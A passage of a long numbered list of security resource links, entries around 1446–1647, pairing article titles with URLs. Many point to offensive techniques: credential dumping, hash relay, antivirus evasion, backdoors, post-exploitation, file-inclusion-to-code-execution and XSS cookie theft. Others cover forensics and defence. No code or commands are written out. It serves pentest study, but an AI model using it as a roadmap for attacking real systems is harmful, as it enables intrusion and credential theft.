Running Mimikatz with PowerLine:\n\n\n\nhttps://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html\n\n\n\n\n-1447-How to Steal Windows Credentials with Mimikatz and Metasploit:\n\n\n\n\nhttps://www.hackingloops.com/mimikatz/\n\n\n\n\n-1448-Retrieving NTLM Hashes without touching LSASS:\n\n\n\nhttps://www.andreafortuna.org/2018/03/26/retrieving-ntlm-hashes-without-touching-lsass-the-internal-monologue-attack/\n\n\n\n\n-1449-From Responder to NT Authority\SYSTEM:\n\n\n\n\nhttps://medium.com/bugbountywriteup/from-responder-to-nt-authority-system-39abd3593319\n\n\n\n\n-1450-Getting Creds via NTLMv2:\n\n\n\nhttps://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html\n\n\n\n\n\n-1451-Living off the land: stealing NetNTLM hashes:\n\n\n\n\nhttps://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html\n\n\n\n\n\n-1452-(How To) Using Responder to capture passwords on a Windows:\n\n\n\nwww.securityflux.com/?p=303\n\n\n\n\n\n-1453-Pwning with Responder - A Pentester's Guide:\n\n\n\n\nhttps://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/\n\n\n\n\n-1454-LLMNR and NBT-NS Poisoning Using Responder:\n\n\n\n\nhttps://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/\n\n\n\n\n-1455-Responder - Ultimate Guide :\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/\n\n\n\n-1456-Responder - CheatSheet:\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/\n\n\n\n\n-1457-LM, NTLM, Net-NTLMv2, oh my! 
:\n\n\n\nhttps://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4\n\n\n\n\n-1458-SMB Relay Attack Tutorial:\n\n\n\n\nhttps://intrinium.com/smb-relay-attack-tutorial\n\n\n\n-1459-Cracking NTLMv2 responses captured using responder:\n\n\n\n\nhttps://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/\n\n\n\n\n-1460-Skip Cracking Responder Hashes and Relay Them:\n\n\n\nhttps://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/\n\n\n\n\n-1461-Metasploit's First Antivirus Evasion Modules:\n\n\n\n\nhttps://blog.rapid7.com/2018/10/09/introducing-metasploits-first-evasion-module/\n\n\n\n\n-1462-Evading Anti-virus Part 1: Infecting EXEs with Shellter:\n\n\n\n\nhttps://www.hackingloops.com/evading-anti-virus-shellter/\n\n\n\n\n\n-1463-Evading AV with Shellter:\n\n\n\nhttps://www.securityartwork.es/2018/11/02/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-i/\n\n\n\n\n\n-1464-Shellter-A Shellcode Injecting Tool :\n\n\n\n\nhttps://www.hackingarticles.in/shellter-a-shellcode-injecting-tool/\n\n\n\n\n-1465-Bypassing antivirus programs using SHELLTER:\n\n\n\nhttps://myhackstuff.com/shellter-bypassing-antivirus-programs/\n\n\n\n\n-1466-John the Ripper step-by-step tutorials for end-users :\n\n\n\nopenwall.info/wiki/john/tutorials\n\n\n\n\n-1467-Beginners Guide for John the Ripper (Part 1):\n\n\n\nhttps://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/\n\n\n\n\n-1468-John the Ripper Basics Tutorial:\n\n\n\nhttps://ultimatepeter.com/john-the-ripper-basics-tutorial/\n\n\n\n\n-1469-Crack Windows password with john the ripper:\n\n\n\nhttps://www.securitynewspaper.com/2018/11/27/crack-windows-password-with-john-the-ripper/\n\n\n\n\n-1470-Getting Started Cracking Password Hashes with John the Ripper :\n\n\n\nhttps://www.tunnelsup.com/getting-started-cracking-password-hashes/\n\n\n\n-1471-Shell code exploit with Buffer 
overflow:\n\n\n\nhttps://medium.com/@jain.sm/shell-code-exploit-with-buffer-overflow-8d78cc11f89b\n\n\n\n-1472-Shellcoding for Linux and Windows Tutorial :\n\n\n\nwww.vividmachines.com/shellcode/shellcode.html\n\n\n\n\n-1473-Buffer Overflow Practical Examples :\n\n\n\n\nhttps://0xrick.github.io/binary-exploitation/bof5/\n\n\n\n\n-1474-Msfvenom shellcode analysis:\n\n\n\nhttps://snowscan.io/msfvenom-shellcode-analysis/\n\n\n\n\n-1475-Process Continuation Shellcode:\n\n\n\nhttps://azeria-labs.com/process-continuation-shellcode/\n\n\n\n\n-1476-Dynamic Shellcode Execution:\n\n\n\nhttps://www.countercept.com/blog/dynamic-shellcode-execution/\n\n\n\n-1477-Tutorials: Writing shellcode to binary files:\n\n\n\nhttps://www.fuzzysecurity.com/tutorials/7.html\n\n\n\n\n\n-1478-Creating Shellcode for an Egg Hunter :\n\n\n\nhttps://securitychops.com/2018/05/26/slae-assignment-3-egghunter-shellcode.html\n\n\n\n\n-1479-How to: Shellcode to reverse bind a shell with netcat :\n\n\n\nwww.hackerfall.com/story/shellcode-to-reverse-bind-a-shell-with-netcat\n\n\n\n-1480-Bashing the Bash — Replacing Shell Scripts with Python:\n\n\n\nhttps://medium.com/capital-one-tech/bashing-the-bash-replacing-shell-scripts-with-python-d8d201bc0989\n\n\n\n\n-1481-How to See All Devices on Your Network With nmap on Linux:\n\n\n\nhttps://www.howtogeek.com/.../how-to-see-all-devices-on-your-network-with-nmap-on-linux\n\n\n\n-1482-A Complete Guide to Nmap:\n\n\n\nhttps://www.edureka.co/blog/nmap-tutorial/\n\n\n\n\n-1483-Nmap from Beginner to Advanced :\n\n\n\nhttps://resources.infosecinstitute.com/nmap/\n\n\n\n-1484-Using Wireshark: Identifying Hosts and Users:\n\n\n\nhttps://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/\n\n\n\n\n-1485-tshark tutorial and filter examples:\n\n\n\nhttps://hackertarget.com/tshark-tutorial-and-filter-examples/\n\n\n\n-1486-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & 
Example:\n\n\n\nhttps://www.guru99.com/fuzz-testing.html\n\n\n\n\n-1487-Tutorial: Dumb Fuzzing - Peach Community Edition:\n\n\n\ncommunity.peachfuzzer.com/v3/TutorialDumbFuzzing.html\n\n\n\n\n-1488-HowTo: ExploitDev Fuzzing:\n\n\n\nhttps://hansesecure.de/2018/03/howto-exploitdev-fuzzing/\n\n\n\n\n-1489-Fuzzing with Metasploit:\n\n\n\nhttps://www.corelan.be/?s=fuzzing\n\n\n\n\n-1490-Fuzzing – how to find bugs automagically using AFL:\n\n\n\n9livesdata.com/fuzzing-how-to-find-bugs-automagically-using-afl/\n\n\n\n\n\n-1491-Introduction to File Format Fuzzing & Exploitation:\n\n\n\nhttps://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3\n\n\n\n\n-1492-0x3 Python Tutorial: Fuzzer:\n\n\n\nhttps://www.primalsecurity.net/0x3-python-tutorial-fuzzer/\n\n\n\n\n-1493-Hunting For Bugs With AFL:\n\n\n\nhttps://research.aurainfosec.io/hunting-for-bugs-101/\n\n\n\n\n-1494-Fuzzing: The New Unit Testing:\n\n\n\n\nhttps://www.slideshare.net/DmitryVyukov/fuzzing-the-new-unit-testing\n\n\n\n-1495-Fuzzing With Peach Framework:\n\n\nhttps://www.terminatio.org/fuzzing-peach-framework-full-tutorial-download/\n\n\n\n\n-1496-How we found a tcpdump vulnerability using cloud fuzzing:\n\n\n\nhttps://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/\n\n\n\n\n-1497-Finding a Fuzzer: Peach Fuzzer vs. 
Sulley:\n\n\n\nhttps://medium.com/@jtpereyda/finding-a-fuzzer-peach-fuzzer-vs-sulley-1fcd6baebfd4\n\n\n\n\n-1498-Android malware analysis:\n\n\n\nhttps://www.slideshare.net/rossja/android-malware-analysis-71109948\n\n\n\n-1499-15+ Malware Analysis Tools & Techniques :\n\n\nhttps://www.template.net/business/tools/malware-analysis/\n\n\n\n\n-1500-30 Online Malware Analysis Sandboxes / Static Analyzers:\n\n\n\nhttps://medium.com/@su13ym4n/15-online-sandboxes-for-malware-analysis-f8885ecb8a35\n\n\n\n-1501-Linux Command Line Forensics and Intrusion Detection Cheat Sheet:\n\n\n\nhttps://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/\n\n\n\n-1502-Cheat Sheets - SANS Digital Forensics:\n\n\n\nhttps://digital-forensics.sans.org/community/cheat-sheets\n\n\n\n\n-1503-Breach detection with Linux filesystem forensics:\n\n\n\n\nhttps://opensource.com/article/18/4/linux-filesystem-forensics\n\n\n\n\n-1504-Digital Forensics Cheat Sheets Collection :\n\n\n\n\nhttps://neverendingsecurity.wordpress.com/digital-forensics-cheat-sheets-collection/\n\n\n\n\n-1505-Security Incident Survey Cheat Sheet for Server Administrators:\n\n\n\nhttps://zeltser.com/security-incident-survey-cheat-sheet/\n\n\n\n-1506-Digital forensics: A cheat sheet :\n\n\n\nhttps://www.techrepublic.com/article/digital-forensics-the-smart-persons-guide/\n\n\n\n\n-1507-Windows Registry Forensics using 'RegRipper' Command-Line on Linux:\n\n\n\nhttps://www.pinterest.cl/pin/794815034207804059/\n\n\n\n\n-1508-Windows IR Live Forensics Cheat Sheet:\n\n\n\nhttps://www.cheatography.com/koriley/cheat-sheets/windows-ir-live-forensics/\n\n\n\n\n-1509-10 Best Known Forensics Tools That Works on Linux:\n\n\n\nhttps://linoxide.com/linux-how-to/forensics-tools-linux/\n\n\n\n-1510-Top 20 Free Digital Forensic Investigation Tools for SysAdmins:\n\n\n\nhttps://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/\n\n\n\n\n-1511-Windows Volatile Memory Acquisition & Forensics 
2018:\n\n\n\nhttps://medium.com/@lucideus/windows-volatile-memory-acquisition-forensics-2018-lucideus-forensics-3f297d0e5bfd\n\n\n\n\n-1512-PowerShell Cheat Sheet :\n\n\n\nhttps://www.digitalforensics.com/blog/powershell-cheat-sheet-2/\n\n\n\n\n-1513-Forensic Artifacts: evidences of program execution on Windows systems:\n\n\n\n\n\nhttps://www.andreafortuna.org/forensic-artifacts-evidences-of-program-execution-on-windows-systems\n\n\n\n-1514-How to install a CPU?:\n\n\nhttps://www.computer-hardware-explained.com/how-to-install-a-cpu.html\n\n\n\n-1515-How To Upgrade and Install a New CPU or Motherboard:\n\n\n\nhttps://www.howtogeek.com/.../how-to-upgrade-and-install-a-new-cpu-or-motherboard-or-both\n\n\n\n-1516-Installing and Troubleshooting CPUs:\n\n\n\nwww.pearsonitcertification.com/articles/article.aspx?p=1681054&seqNum=2\n\n\n\n\n\n-1517-15 FREE Pastebin Alternatives You Can Use Right Away:\n\n\n\nhttps://www.rootreport.com/pastebin-alternatives/\n\n\n\n\n-1518-Basic computer troubleshooting steps:\n\n\n\nhttps://www.computerhope.com/basic.htm\n\n\n\n\n-1519-18 Best Websites to Learn Computer Troubleshooting and Tech support:\n\n\n\nhttp://transcosmos.co.uk/best-websites-to-learn-computer-troubleshooting-and-tech-support\n\n\n\n\n\n-1520-Post Exploitation with PowerShell Empire 2.3.0 :\n\n\n\nhttps://www.yeahhub.com/post-exploitation-powershell-empire-2-3-0-detailed-tutorial/\n\n\n\n\n-1521-Windows Persistence with PowerShell Empire :\n\n\nhttps://www.hackingarticles.in/windows-persistence-with-powershell-empire/\n\n\n\n\n-1522-powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial:\n\n\n\nhttps://www.dudeworks.com/powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial\n\n\n\n\n-1523-Bypassing Anti-Virtus & Hacking Windows 10 Using Empire :\n\n\n\nhttps://zsecurity.org/bypassing-anti-virtus-hacking-windows-10-using-empire/\n\n\n\n\n-1524-Hacking with Empire – PowerShell Post-Exploitation Agent 
:\n\n\n\nhttps://www.prodefence.org/hacking-with-empire-powershell-post-exploitation-agent/\n\n\n\n\n-1525-Hacking Windows Active Directory Full guide:\n\n\n\nwww.kalitut.com/hacking-windows-active-directory-full.html\n\n\n\n-1526-PowerShell Empire for Post-Exploitation:\n\n\n\n\nhttps://www.hackingloops.com/powershell-empire/\n\n\n\n-1527-Generate A One-Liner – Welcome To LinuxPhilosophy!:\n\n\n\nlinuxphilosophy.com/rtfm/more/empire/generate-a-one-liner/\n\n\n\n\n-1528-CrackMapExec - Ultimate Guide:\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/\n\n\n\n\n-1529-PowerShell Logging and Security:\n\n\n\nhttps://www.secjuice.com/enterprise-powershell-protection-logging/\n\n\n\n\n-1530-Create your own FUD Backdoors with Empire:\n\n\n\n\nhttp://blog.extremehacking.org/blog/2016/08/25/create-fud-backdoors-empire/\n\n\n\n\n-1531-PowerShell Empire Complete Tutorial For Beginners:\n\n\n\nhttps://video.hacking.reviews/2019/06/powershell-empire-complete-tutorial-for.html\n\n\n\n\n-1532-Bash Bunny: Windows Remote Shell using Metasploit & PowerShell:\n\n\n\nhttps://cyberarms.wordpress.com/.../bash-bunny-windows-remote-shell-using-metasploit-powershell\n\n\n\n-1533-Kerberoasting - Stealing Service Account Credentials:\n\n\n\nhttps://www.scip.ch/en/?labs.20181011\n\n\n\n\n-1534-Automating Mimikatz with Empire and DeathStar :\n\n\n\nhttps://blog.stealthbits.com/automating-mimikatz-with-empire-and-deathstar/\n\n\n\n\n-1535-Windows oneliners to get shell :\n\n\n\n\nhttps://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/\n\n\n\n\n-1536-ObfuscatedEmpire :\n\n\n\nhttps://cobbr.io/ObfuscatedEmpire.html\n\n\n\n\n-1537-Pentesting with PowerShell in six steps:\n\n\n\nhttps://periciacomputacional.com/pentesting-with-powershell-in-six-steps/\n\n\n\n\n-1538-Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM):\n\n\n\nhttps://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm\n\n\n\n\n-1539-PowerShell 
Security Best Practices:\n\n\n\nhttps://www.digitalshadows.com/blog-and-research/powershell-security-best-practices/\n\n\n\n\n-1540-You can detect PowerShell attacks:\n\n\n\nhttps://www.slideshare.net/Hackerhurricane/you-can-detect-powershell-attacks\n\n\n\n\n-1541-Detecting and Preventing PowerShell Attacks:\n\n\n\n\nhttps://www.eventsentry.com/.../powershell-pw3rh311-detecting-preventing-powershell-attacks\n\n\n\n\n-1542-Detecting Offensive PowerShell Attack Tools – Active Directory Security:\n\n\n\nhttps://adsecurity.org/?p=2604\n\n\n\n\n-1543-An Internal Pentest Audit Against Active Directory:\n\n\n\nhttps://www.exploit-db.com/docs/46019\n\n\n\n\n-1544-A complete Active Directory Penetration Testing Checklist :\n\n\n\n\nhttps://gbhackers.com/active-directory-penetration-testing-checklist/\n\n\n\n\n-1545-Active Directory | Penetration Testing Lab:\n\n\n\nhttps://pentestlab.blog/tag/active-directory/\n\n\n\n\n-1546-Building and Attacking an Active Directory lab with PowerShell :\n\n\n\n\nhttps://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell\n\n\n\n\n-1547-Penetration Testing in Windows Server Active Directory using Metasploit:\n\n\n\nhttps://www.hackingarticles.in/penetration-testing-windows-server-active-directory-using-metasploit-part-1\n\n\n\n\n-1548-Red Team Penetration Testing – Going All the Way (Part 2 of 3) :\n\n\n\nhttps://www.anitian.com/red-team-testing-going-all-the-way-part2/\n\n\n\n\n-1549-Penetration Testing Active Directory, Part II:\n\n\n\nhttps://www.jishuwen.com/d/2Mtq\n\n\n\n\n-1550-Gaining Domain Admin from Outside Active Directory:\n\n\n\n\nhttps://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html\n\n\n\n\n-1551-Post Exploitation Cheat Sheet:\n\n\n\nhttps://0xsecurity.com/blog/some-hacking-techniques/post-exploitation-cheat-sheet\n\n\n\n\n-1552-Windows post-exploitation :\n\n\n\n\nhttps://github.com/emilyanncr/Windows-Post-Exploitation\n\n\n\n\n-1553-OSCP - 
Windows Post Exploitation :\n\n\n\n\nhttps://hackingandsecurity.blogspot.com/2017/9/oscp-windows-post-exploitation.html\n\n\n\n\n-1554-Windows Post-Exploitation Command List:\n\n\n\nhttp://pentest.tonyng.net/windows-post-exploitation-command-list/\n\n\n\n\n-1555-Windows Post-Exploitation Command List:\n\n\n\n\nhttp://tim3warri0r.blogspot.com/2012/09/windows-post-exploitation-command-list.html\n\n\n\n\n-1556-Linux Post-Exploitation · OSCP - Useful Resources:\n\n\n\n\nhttps://backdoorshell.gitbooks.io/oscp-useful-links/content/linux-post-exploitation.html\n\n\n\n\n-1557-Pentesting Cheatsheet:\n\n\n\nhttps://anhtai.me/pentesting-cheatsheet/\n\n\n\n\n-1558-Pentesting Cheatsheets - Red Teaming Experiments:\n\n\n\nhttps://ired.team/offensive-security-experiments/offensive-security-cheetsheets\n\n\n\n\n-1559-OSCP Goldmine:\n\n\n\nhttp://0xc0ffee.io/blog/OSCP-Goldmine\n\n\n\n\n-1560-Linux Post Exploitation Cheat Sheet:\n\n\n\nhttp://red-orbita.com/?p=8455\n\n\n\n\n-1562-OSCP useful resources and tools:\n\n\n\nhttps://acknak.fr/en/articles/oscp-tools/\n\n\n\n\n-1563-Windows Post-Exploitation Command List :\n\n\n\n\nhttps://es.scribd.com/document/100182787/Windows-Post-Exploitation-Command-List\n\n\n\n\n-1564-Metasploit Cheat Sheet:\n\n\n\nhttps://pentesttools.net/metasploit-cheat-sheet/\n\n\n\n\n-1565-Windows Privilege Escalation:\n\n\n\nhttps://awansec.com/windows-priv-esc.html\n\n\n\n\n-1566-Linux Unix Bsd Post Exploitation:\n\n\n\nhttps://attackerkb.com/Unix/LinuxUnixBSD_Post_Exploitation\n\n\n\n\n-1567-Privilege Escalation & Post-Exploitation:\n\n\n\nhttps://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/\n\n\n\n\n-1568-Metasploit Cheat Sheet:\n\n\n\nhttps://vk-intel.org/2016/12/28/metasploit-cheat-sheet/\n\n\n\n\n-1569-Metasploit Cheat Sheet :\n\n\n\nhttps://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/\n\n\n\n\n-1570-Privilege escalation: 
Linux:\n\n\n\n\nhttps://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux\n\n\n\n\n-1571-Cheat Sheets — Amethyst Security:\n\n\n\n\nhttps://www.ssddcyber.com/cheatsheets\n\n\n\n\n-1572-Responder - CheatSheet:\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/\n\n\n\n\n-1573-Cheatsheets:\n\n\n\nhttps://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt\n\n\n\n\n-1574-Are you ready for OSCP?:\n\n\n\nhttps://www.hacktoday.io/t/are-you-ready-for-oscp/59\n\n\n\n\n-1575-Windows Privilege Escalation:\n\n\n\nhttps://labs.p64cyber.com/windows-privilege-escalation/\n\n\n\n\n-1576-A guide to Linux Privilege Escalation:\n\n\n\nhttps://payatu.com/guide-linux-privilege-escalation/\n\n\n\n\n-1577-Windows Post-Exploitation-Cheat-Sheet:\n\n\n\n\nhttp://pentestpanther.com/2019/07/01/windows-post-exploitation-cheat-sheet/\n\n\n\n-1578-Windows Privilege Escalation (privesc) Resources:\n\n\n\nhttps://www.willchatham.com/security/windows-privilege-escalation-privesc-resources/\n\n\n\n-1579-Dissecting Mobile Malware:\n\n\n\nhttps://slideplayer.com/slide/3434519/\n\n\n\n\n-1580-Android malware analysis with Radare: Dissecting the Triada Trojan:\n\n\n\n\nwww.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triad/\n\n\n\n\n-1581-Dissecting Mobile Native Code Packers:\n\n\n\nhttps://blog.zimperium.com/dissecting-mobile-native-code-packers-case-study/\n\n\n\n\n-1582-What is Mobile Malware? 
Defined, Explained, and Explored:\n\n\n\nhttps://www.forcepoint.com/cyber-edu/mobile-malware\n\n\n\n\n-1583-Malware Development — Professionalization of an Ancient Art:\n\n\n\nhttps://medium.com/scip/malware-development-professionalization-of-an-ancient-art-4dfb3f10f34b\n\n\n\n\n-1584-Weaponizing Malware Code Sharing with Cythereal MAGIC:\n\n\n\nhttps://medium.com/@arun_73782/cythereal-magic-e68b0c943b1d\n\n\n\n\n-1585-Web App Pentest Cheat Sheet:\n\n\n\nhttps://medium.com/@muratkaraoz/web-app-pentest-cheat-sheet-c17394af773\n\n\n\n\n-1586-The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued:\n\n\n\nhttps://medium.com/@jeremy.trinka/the-usb-threat-is-still-real-pentest-tools-for-sysadmins-continued-88560af447bf\n\n\n\n\n-1587-How to Run An External Pentest:\n\n\n\nhttps://medium.com/@_jayhill/how-to-run-an-external-pentest-dd76ed14bb6a\n\n\n\n\n-1588-Advice for new pentesters:\n\n\n\nhttps://medium.com/@PentesterLab/advice-for-new-pentesters-a5f7d75a3aea\n\n\n\n\n-1589-NodeJS Application Pentest Tips:\n\n\n\nhttps://medium.com/bugbountywriteup/nodejs-application-pentest-tips-improper-uri-handling-in-express-390b3a07cb3e\n\n\n\n\n-1590-How to combine Pentesting with Automation to improve your security:\n\n\n\nhttps://medium.com/how-to-combine-pentest-with-automation-to-improve-your-security\n\n\n\n-1591-Day 79: FTP Pentest Guide:\n\n\n\nhttps://medium.com/@int0x33/day-79-ftp-pentest-guide-5106967bd50a\n\n\n\n\n-1592-SigintOS: A Wireless Pentest Distro Review:\n\n\n\nhttps://medium.com/@tomac/sigintos-a-wireless-pentest-distro-review-a7ea93ee8f8b\n\n\n\n\n-1593-Conducting an IoT Pentest :\n\n\n\nhttps://medium.com/p/6fa573ac6668?source=user_profile...\n\n\n\n\n-1594-Efficient way to pentest Android Chat Applications:\n\n\n\nhttps://medium.com/android-tamer/efficient-way-to-pentest-android-chat-applications-46221d8a040f\n\n\n\n\n-1595-APT2 - Automated PenTest Toolkit 
:\n\n\n\nhttps://medium.com/media/f1cf43d92a17d5c4c6e2e572133bfeed/href\n\n\n\n-1596-Pentest Tools and Distros:\n\n\n\nhttps://medium.com/hacker-toolbelt/pentest-tools-and-distros-9d738d83f82d\n\n\n\n\n-1597-Keeping notes during a pentest/security assessment/code review:\n\n\n\nhttps://blog.pentesterlab.com/keeping-notes-during-a-pentest-security-assessment-code-review-7e6db8091a66?gi=4c290731e24b\n\n\n\n\n-1598-An intro to pentesting an Android phone:\n\n\n\nhttps://medium.com/@tnvo/an-intro-to-pentesting-an-android-phone-464ec4860f39\n\n\n\n-1599-The Penetration Testing Report:\n\n\n\nhttps://medium.com/@mtrdesign/the-penetration-testing-report-38a0a0b25cf2\n\n\n\n-1600-VA vs Pentest:\n\n\n\nhttps://medium.com/@play.threepetsirikul/va-vs-pentest-cybersecurity-2a17250d5e03\n\n\n\n-1601-Pentest: Hacking WPA2 WiFi using Aircrack on Kali Linux:\n\n\n\nhttps://medium.com/@digitalmunition/pentest-hacking-wpa2-wifi-using-aircrack-on-kali-linux-99519fee946f\n\n\n\n-1602-Pentesting Ethereum dApps:\n\n\n\nhttps://medium.com/@brandonarvanaghi/pentesting-ethereum-dapps-2a84c8dfee19\n\n\n\n\n-1603-Android pentest lab in a nutshell :\n\n\n\n\nhttps://medium.com/@dortz/android-pentest-lab-in-a-nutshell-ee60be8638d3\n\n\n\n-1604-Pentest Magazine: Web Scraping with Python :\n\n\n\nhttps://medium.com/@heavenraiza/web-scraping-with-python-170145fd90d3\n\n\n\n-1605-Pentesting iOS apps without jailbreak:\n\n\n\nhttps://medium.com/securing/pentesting-ios-apps-without-jailbreak-91809d23f64e\n\n\n\n\n-1606-OSCP/Pen Testing Resources:\n\n\n\n\nhttps://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45\n\n\n\n\n-1607-Web Application Security & Bug Bounty (Methodology, Reconnaissance, Vulnerabilities, Reporting):\n\n\n\nhttps://blog.usejournal.com/web-application-security-bug-bounty-methodology-reconnaissance-vulnerabilities-reporting-635073cddcf2?gi=4a578db171dc\n\n\n\n-1608-Local File Inclusion (LFI) — Web Application Penetration 
Testing:\n\n\n\nhttps://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601\n\n\n\n-1609-Local File Inclusion (Basic):\n\n\nhttps://medium.com/@kamransaifullah786/local-file-inclusion-basic-242669a7af3\n\n\n\n-1610-PHP File Inclusion Vulnerability:\n\n\n\nhttps://www.immuniweb.com/vulnerability/php-file-inclusion.html\n\n\n\n\n-1611-Local File Inclusion:\n\n\n\n\nhttps://teambi0s.gitlab.io/bi0s-wiki/web/lfi/\n\n\n\n\n-1612-Web Application Penetration Testing: Local File Inclusion:\n\n\n\nhttps://hakin9.org/web-application-penetration-testing-local-file-inclusion-lfi-testing/\n\n\n\n\n-1613-From Local File Inclusion to Code Execution :\n\n\n\nhttps://resources.infosecinstitute.com/local-file-inclusion-code-execution/\n\n\n\n\n-1614-RFI / LFI:\n\n\n\nhttps://security.radware.com/ddos-knowledge-center/DDoSPedia/rfi-lfi/\n\n\n\n\n-1615-From Local File Inclusion to Remote Code Execution - Part 2:\n\n\n\nhttps://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2\n\n\n\n\n-1616-Local File Inclusion:\n\n\n\nhttps://xapax.gitbooks.io/security/content/local_file_inclusion.html\n\n\n\n-1617-Beginner Guide to File Inclusion Attack (LFI/RFI) :\n\n\n\nhttps://www.hackingarticles.in/beginner-guide-file-inclusion-attack-lfirfi/\n\n\n\n\n-1618-LFI / RFI:\n\n\n\nhttps://secf00tprint.github.io/blog/payload-tester/lfirfi/en\n\n\n\n\n-1619-LFI and RFI Attacks - All You Need to Know:\n\n\n\n\nhttps://www.getastra.com/blog/your-guide-to-defending-against-lfi-and-rfi-attacks/\n\n\n\n\n-1620-Log Poisoning - LFI to RCE :\n\n\n\nhttp://liberty-shell.com/sec/2018/05/19/poisoning/\n\n\n\n-1621-LFI:\n\n\n\nhttps://www.slideshare.net/cyber-punk/lfi-63050678\n\n\n\n\n-1622-Hand Guide To Local File Inclusion(LFI):\n\n\n\nwww.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html\n\n\n\n\n-1623-Local File Inclusion (LFI) - Cheat Sheet:\n\n\n\nhttps://ironhackers.es/herramientas/lfi-cheat-sheet/\n\n\n\n\n-1624-Web Application 
Penetration Testing Local File Inclusion (LFI):\n\n\n\n\nhttps://www.cnblogs.com/Primzahl/p/6258149.html\n\n\n\n\n-1625-File Inclusion Vulnerability Prevention:\n\n\n\n\nhttps://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/\n\n\n\n\n-1626-The Most In-depth Hacker's Guide:\n\n\n\nhttps://books.google.com/books?isbn=1329727681\n\n\n\n\n-1627-Hacking Essentials: The Beginner's Guide To Ethical Hacking:\n\n\n\n\nhttps://books.google.com/books?id=e6CHDwAAQBAJ\n\n\n\n\n-1628-Web App Hacking, Part 11: Local File Inclusion:\n\n\n\nhttps://www.hackers-arise.com/.../Web-App-Hacking-Part-11-Local-File-Inclusion-LFI\n\n\n\n\n-1629-Local and remote file inclusion :\n\n\n\nhttps://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi\n\n\n\n\n\n-1630-Upgrade from LFI to RCE via PHP Sessions :\n\n\n\nhttps://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/\n\n\n\n\n-1631-CVV #1: Local File Inclusion:\n\n\n\nhttps://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a\n\n\n\n\n-1632-(PDF) Cross Site Scripting (XSS) in Action:\n\n\n\n\n\nhttps://www.researchgate.net/publication/241757130_Cross_Site_Scripting_XSS_in_Action\n\n\n\n\n\n-1633-XSS exploitation part 1:\n\n\n\nwww.securityidiots.com/Web-Pentest/XSS/xss-exploitation-series-part-1.html\n\n\n\n\n\n-1634-Weaponizing self-xss:\n\n\n\n\nhttps://silentbreaksecurity.com/weaponizing-self-xss/\n\n\n\n\n-1635-Cookie Tracking and Stealing using Cross-Site Scripting:\n\n\n\n\nhttps://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/\n\n\n\n\n-1636-Defense against the Black Arts:\n\n\n\nhttps://books.google.com/books?isbn=1439821224\n\n\n\n\n-1637-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens:\n\n\n\n\nhttps://www.acunetix.com/websitesecurity/csrf-attacks/\n\n\n\n\n\n-1638-Bypassing CSRF protection:\n\n\n\n\nhttps://www.bugbountynotes.com/training/tutorial?id=5\n\n\n\n\n-1639-Stealing CSRF tokens with 
XSS:\n\n\n\nhttps://digi.ninja/blog/xss_steal_csrf_token.php\n\n\n\n\n-1640-Same Origin Policy and ways to Bypass:\n\n\n\n\nhttps://medium.com/@minosagap/same-origin-policy-and-ways-to-bypass-250effdc4a12\n\n\n\n\n-1641-Bypassing Same Origin Policy :\n\n\n\nhttps://resources.infosecinstitute.com/bypassing-same-origin-policy-sop/\n\n\n\n-1642-Client-Side Attack - an overview :\n\n\n\n\nhttps://www.sciencedirect.com/topics/computer-science/client-side-attack\n\n\n\n\n-1643-Client-Side Injection Attacks:\n\n\n\nhttps://blog.alertlogic.com/blog/client-side-injection-attacks/\n\n\n\n\n-1645-The Client-Side Battle Against JavaScript Attacks Is Already Here:\n\n\n\n\nhttps://medium.com/swlh/the-client-side-battle-against-javascript-attacks-is-already-here-656f3602c1f2\n\n\n\n\n\n-1646-Why Let’s Encrypt is a really, really, really bad idea:\n\n\n\n\nhttps://medium.com/swlh/why-lets-encrypt-is-a-really-really-really-bad-idea-d69308887801\n\n\n\n\n\n-1647-Huge Guide to Client-Side 